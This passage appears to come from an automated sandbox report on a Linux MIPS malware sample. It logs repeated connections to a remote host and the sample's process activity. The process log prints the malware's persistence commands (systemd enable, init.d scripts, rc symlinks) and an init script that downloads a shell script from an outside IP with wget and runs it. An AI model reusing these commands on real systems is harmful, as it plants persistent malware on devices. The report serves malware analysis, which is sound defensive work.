Dec 27, 2024 09:19:04.987833023 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:05.497421980 CET	38242	60102	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:05.497529030 CET	60102	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:05.828066111 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:05.947647095 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:05.947736979 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:05.947762012 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:06.067195892 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:06.452195883 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:06.611888885 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:07.099013090 CET	38242	60104	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:07.099100113 CET	60104	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:07.453780890 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:07.573312998 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:07.573443890 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:07.573532104 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:07.693397045 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:08.079083920 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:08.239995956 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:08.722944021 CET	38242	60106	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:08.723037004 CET	60106	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:09.080452919 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:09.200145960 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:09.200217009 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:09.200443029 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:09.319905043 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:09.704972029 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:09.871865034 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:10.401151896 CET	38242	60108	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:10.401253939 CET	60108	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:10.706356049 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:10.826112032 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:10.826211929 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:10.826235056 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:10.947853088 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:11.329490900 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:11.571897030 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:12.009615898 CET	38242	60110	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:12.009699106 CET	60110	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:12.330806017 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:12.450333118 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:12.450403929 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:12.450431108 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:12.570008039 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:12.954955101 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:13.115868092 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:13.600315094 CET	38242	60112	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:13.600512981 CET	60112	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:13.955826044 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:14.077635050 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:14.077719927 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:14.077776909 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:14.197489977 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:14.583367109 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:14.751920938 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:15.219286919 CET	38242	60114	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:15.219418049 CET	60114	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:15.585081100 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:15.704843998 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:15.704931021 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:15.705008030 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:15.824661970 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:16.211522102 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:16.371959925 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:16.832678080 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:16.832781076 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:17.212517023 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:17.332175016 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:17.332262039 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:17.332442045 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:17.451984882 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:17.836390018 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:17.999934912 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:18.546677113 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:18.546762943 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:18.837454081 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:18.956953049 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:18.957125902 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:18.957223892 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:19.076862097 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:19.461802006 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:19.627898932 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:20.082568884 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:20.082693100 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:20.463279009 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:20.582726002 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:20.582978964 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:20.583064079 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:20.702517033 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:21.088805914 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:21.251940966 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:21.739666939 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:21.739918947 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:22.089803934 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:22.209510088 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:22.209662914 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:22.209691048 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:22.329274893 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:22.715893984 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:22.875888109 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:23.370845079 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:23.371056080 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:23.717396975 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:23.836847067 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:23.837035894 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:23.837035894 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:23.956787109 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:24.341217041 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:24.503912926 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:25.064898014 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:25.065011978 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:25.342143059 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:25.461760998 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:25.461891890 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:25.461906910 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:25.581393957 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:25.965461016 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:26.131881952 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:26.656889915 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:26.656965017 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:26.966370106 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:27.100471020 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:27.100601912 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:27.100631952 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:27.285064936 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:27.604756117 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:27.768013954 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:28.255379915 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:28.255497932 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:28.606537104 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:28.726116896 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:28.726242065 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:28.726346970 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:28.845793962 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:29.232523918 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:29.395946026 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:29.870851994 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:29.870954037 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:30.234307051 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:30.353868008 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:30.354052067 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:30.354090929 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:30.473715067 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:30.859989882 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:31.020159960 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:31.513895035 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:31.514024019 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:31.861368895 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:31.981070995 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:31.981331110 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:31.981404066 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:32.100784063 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:32.487333059 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:32.647974014 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:33.186414003 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:33.186522007 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:33.488924980 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:33.608489037 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:33.608609915 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:33.608827114 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:33.728244066 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:34.114921093 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:34.276002884 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:34.784575939 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:34.784734964 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:35.116513968 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:35.235934019 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:35.236103058 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:35.236139059 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:35.355556011 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:35.740755081 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:35.903980017 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:36.431843042 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:36.431962967 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:36.741883993 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:36.862724066 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:36.862793922 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:36.862890959 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:36.982302904 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:37.369446039 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:37.532097101 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:38.049506903 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:38.049650908 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:38.370512962 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:38.491394997 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:38.491461992 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:38.491492033 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:38.611074924 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:38.994996071 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:39.155939102 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:39.606739998 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:39.606826067 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:39.996083021 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:40.115731955 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:40.115797043 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:40.115817070 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:40.235318899 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:40.619856119 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:40.780180931 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:41.259361982 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:41.259444952 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:41.620795965 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:41.926326990 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:41.926393032 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:41.926424026 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:42.046068907 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:42.430327892 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:42.591955900 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:43.105169058 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:43.105238914 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:43.431329012 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:43.551079035 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:43.551156044 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:43.551187038 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:43.670624018 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:44.055888891 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:44.220218897 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:44.713789940 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:44.713862896 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:45.056930065 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:45.176597118 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:45.176810026 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:45.176842928 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:45.296318054 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:45.682238102 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:45.844046116 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:46.330027103 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:46.330104113 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:46.683530092 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:46.803045988 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:46.803127050 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:46.803164005 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:46.922605038 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 27, 2024 09:19:47.308578968 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:19:47.471981049 CET	38242	60154	94.156.227.234	192.168.2.23

System Behavior

Analysis Process: mipsel.nn.elf PID: 6207, Parent PID: 6125

General

Start time (UTC):	08:17:41
Start date (UTC):	27/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	/tmp/mipsel.nn.elf
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:17:41
Start date (UTC):	27/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:17:41
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:41
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:41
Start date (UTC):	27/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	08:17:41
Start date (UTC):	27/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:17:41
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/mipsel.nn.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:17:41
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:17:41
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:17:41
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	08:17:41
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:17:42
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:17:43
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:17:43
